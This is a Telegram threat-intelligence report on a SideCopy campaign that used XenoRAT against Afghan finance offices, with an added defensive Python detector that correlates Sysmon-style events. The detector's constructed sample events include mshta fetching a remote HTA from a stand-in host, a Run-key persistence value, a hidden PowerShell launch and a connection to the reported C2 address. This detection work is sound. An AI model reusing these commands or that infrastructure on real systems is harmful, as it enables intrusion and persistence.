Source-attributed Telegram item

Source-attributed Telegram post from SIT Reports (@sitreports), a Tier 3 fast-alert source in the Global Conflict category. Fast situation reports can outrun confirmation and should be cross-checked. Public Telegram broadcast channel promoted after bounded no-media handle validation on 2026-05-31.


🔍 SideCopy Uses XenoRAT Against Afghan Finance Network

SideCopy, linked to Transparent Tribe/APT36, is assessed to have targeted Afghanistan’s Ministry of Finance and all 34 provincial revenue directorates with a spear-phishing chain delivering XenoRAT 1.8.7. The lure used a Pashto-named LNK inside a ZIP archive, then abused mshta.exe, remote HTA stages, reflective .NET loading, AMSI patching, and registry persistence. XenoRAT connected to 185.235.137.106 via AES-encrypted TCP traffic.

The operation stands out for target-specific decoy material listing provincial finance staff and direct numbers, indicating prior collection before delivery. TTPs remain consistent with long-observed SideCopy tradecraft, while the use of government-adjacent Afghan infrastructure and bulletproof hosting shows a layered setup for access, persistence, and command-and-control.

🛰️ Open sources - closed narratives
@sitreports
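What a defender can do with the chain the post describes (LNK launched from explorer, mshta.exe pulling a remote HTA, a Run-key write, then an outbound connection to the reported C2), as an added example that is not part of the original post or of SIT Reports' material. It correlates constructed Sysmon-style process, registry and network events by process lineage, so the three log-visible stages are tied back to the mshta.exe that started the chain even when the beacon comes from a child process. The C2 address is the one the post reports; the HTA host 203.0.113.10, the pids, paths, value names and the PowerShell child are invented for the illustration.

```python
"""Lineage-based correlation of the mshta/HTA -> RAT chain (added example).

Only the C2 address is taken from the post; every event below is constructed
to look like Sysmon process-create, registry-set and network-connect records.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

C2_IOCS = {"185.235.137.106"}  # XenoRAT C2 reported in the post

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)


@dataclass
class Event:
    kind: str             # "process" | "registry" | "network"
    pid: int
    image: str
    ppid: int = 0
    parent_image: str = ""
    cmdline: str = ""
    target: str = ""      # registry value path, or destination IP
    details: str = ""     # registry value data


def classify(ev):
    """Return (stage, evidence) if the event matches one chain stage, else None."""
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    if ev.kind == "process" and image.endswith("\\mshta.exe"):
        url = REMOTE_URL.search(ev.cmdline)
        if url:  # mshta fetching a remote HTA; explorer parent = double-clicked LNK
            stage = "remote_hta_from_lnk" if parent.endswith("\\explorer.exe") else "remote_hta"
            return stage, url.group(0)
    if ev.kind == "registry" and RUN_KEY.search(ev.target):
        # Run-key values pointing at mshta or user-writable paths are the suspicious ones
        if "mshta" in ev.details.lower() or USER_WRITABLE.search(ev.details):
            return "run_key_persistence", ev.details
    if ev.kind == "network" and ev.target in C2_IOCS:
        return "known_c2", ev.target
    return None


def build_lineage(events):
    """pid -> ppid map from the process-create events we have."""
    return {ev.pid: ev.ppid for ev in events if ev.kind == "process"}


def root_of(pid, lineage):
    """Climb to the oldest ancestor we hold a process-create record for."""
    while pid in lineage and lineage[pid] in lineage:
        pid = lineage[pid]
    return pid


def correlate(events, min_stages=2):
    """Group stage hits under the root of their process chain.

    Returns {root_pid: {stage: evidence}} for chains with >= min_stages stages.
    """
    lineage = build_lineage(events)
    chains = defaultdict(dict)
    for ev in events:
        hit = classify(ev)
        if hit:
            chains[root_of(ev.pid, lineage)][hit[0]] = hit[1]
    return {root: stages for root, stages in chains.items() if len(stages) >= min_stages}


# Constructed sample telemetry (not from the reported intrusion).
SAMPLE_EVENTS = [
    # LNK double-clicked in explorer; its target is mshta.exe with a remote HTA URL
    Event("process", 1200, r"C:\Windows\System32\mshta.exe", ppid=800,
          parent_image=r"C:\Windows\explorer.exe",
          cmdline='mshta.exe "http://203.0.113.10/update.hta"'),
    # the HTA stage writes a Run value that re-launches mshta on logon
    Event("registry", 1200, r"C:\Windows\System32\mshta.exe",
          target=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          details="mshta.exe http://203.0.113.10/p.hta"),
    # child process that hosts the loaded payload and beacons out
    Event("process", 1300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          ppid=1200, parent_image=r"C:\Windows\System32\mshta.exe", cmdline="powershell.exe -nop -w hidden"),
    Event("network", 1300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target="185.235.137.106"),
    # benign noise: installer Run value under Program Files, and a local HTA
    Event("registry", 2000, r"C:\Windows\System32\msiexec.exe",
          target=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor",
          details=r'"C:\Program Files\Vendor\agent.exe"'),
    Event("process", 2100, r"C:\Windows\System32\mshta.exe", ppid=2050,
          parent_image=r"C:\Windows\System32\cmd.exe", cmdline=r"mshta.exe C:\Tools\local.hta"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The chain rooted at the explorer-spawned mshta.exe is reported with all three stages; the installer's Run value and the local HTA produce no hits. The reflective .NET loading and AMSI patching the post mentions leave no trace in these three event types, so they need script-block logging, ETW or memory telemetry rather than this kind of process/registry/network correlation.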

global-conflict conflict fast-alert-sensor situation-reports state-media